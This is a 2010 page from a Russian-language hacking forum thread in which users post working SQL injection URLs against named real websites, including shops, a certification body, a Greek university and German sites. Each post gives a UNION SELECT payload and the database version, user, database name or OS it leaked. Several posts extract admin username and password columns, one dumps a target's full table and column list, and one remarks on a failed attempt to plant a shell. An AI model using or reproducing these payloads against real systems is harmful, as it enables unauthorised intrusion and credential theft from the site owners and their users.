ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11981  
Старый 28.04.2010, 09:06
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://buhservis-plus.ru/news-all.php?nid=-1+and+1=2+union+all+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),3,4,5,6--
version : 5.1.41-log
user : m35455@fhe2.hoster.ru
database : db35455m
os : portbld-freebsd8.0
 
Ответить с цитированием

  #11982  
Старый 28.04.2010, 12:37
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.crocs.web.id/footwear_detail.php?mainID=-12+union+select+1,2,3,4,concat(username,char(58),p assword),6,7,8,9,10,11+from+admin+limit+0,1--
 
Ответить с цитированием

  #11983  
Старый 28.04.2010, 17:24
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.flo-cert.net
ТИЦ: 10
PR: 6
Пример запроса:
Код:
http://www.flo-cert.net/flo-cert/main.php?id=-8+union+select+1,concat_ws(0x0b,database(),user(),version(),@@version_compile_os),3,now(),5,6,7,8,9
database - flocert_web2
user - fcw2db@localhost
version - 5.0.32-Debian_7etch10
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
flocert_content,   
flocert_glossary,   
flocert_menus,   
flocert_news,   
flocert_newsletter,   
flocert_topmenu,   
flocert_users
columns:


Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
SPECIFIC_NAME,   
ROUTINE_CATALOG,   
ROUTINE_SCHEMA,   
ROUTINE_NAME,   
ROUTINE_TYPE,   
DTD_IDENTIFIER,   
ROUTINE_BODY,   
ROUTINE_DEFINITION,   
EXTERNAL_NAME,   
EXTERNAL_LANGUAGE,   
PARAMETER_STYLE,   
IS_DETERMINISTIC,   
SQL_DATA_ACCESS,   
SQL_PATH,   
SECURITY_TYP

Последний раз редактировалось aka_zver; 28.04.2010 в 17:32..
 
Ответить с цитированием

  #11984  
Старый 28.04.2010, 20:33
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
Arrow

PHP код:
http://www.fa-kit.ru/users.php?id=-1+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,id,name,pass,role),7,8,9,10,11,12,13+from+USERS+LIMIT+0,1--+ 
role=7 - админы
 
Ответить с цитированием

  #11985  
Старый 28.04.2010, 20:50
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://www.vashilinzy.ru/shop/ALL_.html?v[10]=-31+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),3,4--
version : 4.1.25-log
user : vashili3_root@localhost
database : vashili3_cms
os : portbld-freebsd6.3
 
Ответить с цитированием

  #11986  
Старый 28.04.2010, 21:07
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

PHP код:
http://www.rpguides.de/dnd/game.php?id=-67UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
Host IP: 62.75.178.13
Web Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Powered-by: PHP/5.2.4-2ubuntu5.10
DB Server: MySQL unknown ver
Current DB: RPGuides

переходим на немецкие сайты?


PHP код:
http://www.jempartners.ch/ita/news.php?id=1191UNION ALL SELECT 1,2,3,4,5,6,7,%String_Col%,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
Host IP: 212.90.211.186
Web Server: Apache
Powered-by: PHP/5.2.0-8+etch7
DB Server: MySQL >=5
Current DB: jempartners_ch

Последний раз редактировалось KENT1994; 28.04.2010 в 21:21..
 
Ответить с цитированием

  #11987  
Старый 28.04.2010, 21:52
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию

http://www.kidneytimes.net/article.php?id=-20100301172740+union+select+1,2,version(),4,5,6,7, 8,9,10,11--+

версия - 4
-----
http://dddb.net/php/latestnews_Linked.php?id=-2702+union+select+version(),2,3,4

версия - 5

Последний раз редактировалось S[N]EP; 28.04.2010 в 21:57..
 
Ответить с цитированием

  #11988  
Старый 28.04.2010, 22:27
Dare
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979

Репутация: 53
Отправить сообщение для Dare с помощью ICQ
По умолчанию

Код:
http://brooklynradio.net/show.php?id=-22+union/**/select+1,2,3,4,5,6,user(),8--+
user:soulstat_soulsta@localhost
version:5.1.30
шеленг не прошел =(
 
Ответить с цитированием

  #11989  
Старый 28.04.2010, 22:31
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

едушка

http://www.southeastern.edu.gr/article.php?NewsID=-37+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7,8,9+from+administrator
 
Ответить с цитированием

  #11990  
Старый 29.04.2010, 00:01
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

http://www.gemeindefreiheit.de/de/aktuelles/news.php?id=-20UNION ALL SELECT 1,2,3,4,5,%String_Col%,7,8--

Host IP: 213.198.64.111
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
DB Server: MySQL unknown ver
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ